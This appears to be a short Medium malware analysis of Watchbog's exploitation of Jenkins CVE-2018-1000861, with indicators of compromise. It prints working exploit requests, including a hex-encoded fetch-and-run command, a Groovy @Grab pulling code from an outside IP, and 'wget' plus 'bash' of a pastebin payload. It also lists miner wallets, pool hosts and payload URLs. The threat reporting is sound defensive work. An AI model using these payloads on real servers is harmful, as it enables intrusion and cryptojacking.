Return of Watchbog: Exploiting Jenkins CVE-2018–1000861

Start of Attack

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=True&value=public class x{public x(){new String("776765742068747470733a2f2f706173746562696e2e636f6d2f7261772f42335235556e7768202d4f202f746d702f62616279".decodeHex()).execute()}} HTTP/1.1
Host: [victim_host]:[jenkins_port]
GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27orange.tw%27,%20root=%27http://45.55.211.79/%27)%0a@Grab(group=%27tw.orange%27,%20module=%27poc%27,%20version=%278%27)%0aimport%20Orange; HTTP/1.1
Host: [victim_host]:[jenkins_port]
wget https://pastebin.com/raw/B3R5Unwh -O /tmp/baby
bash /tmp/baby

Mining and Persistence

https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz

Security Suggestion

IOC

44gaihcvA4DHwaWoKgVWyuKXNpuY2fAkKbByPCASosAw6XcrVtQ4VwdHMzoptXVHJwEErbds66L9iWN6dRPNZJCqDhqni3B (previous)
47k2wdnyyBoMT6N9ho5Y7uQg1J6gPsTboKP6JXfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7 (current)
pool.minexmr.com:80
pool.minexmr.com:443
https://pastebin.com/raw/B3R5Unwh
https://pastebin.com/raw/J6NdVBHq
https://pastebin.com/raw/KGwfArMR
https://pastebin.com/raw/AgdgACUD
https://pastebin.com/raw/vvuYb1GC
https://pastebin.com/raw/aGTSGJJp
https://pastebin.com/raw/05p0fTYd
https://pastebin.com/raw/KxWPFeEn
https://pastebin.com/raw/X6wvuv98
https://pixeldra.in/api/download/nZ2s4L
65cfcad6dc3d31695b8f3ffa08e5d389
95721de55ad89005484b4c21f768d94e
157495f6ba8c36c38984d1f902cf3ac0
314097a1d41697352c961026aa1ed87c
1dbd97c70a89e64cbfb65c78ac39938e
/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data

Reference:

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store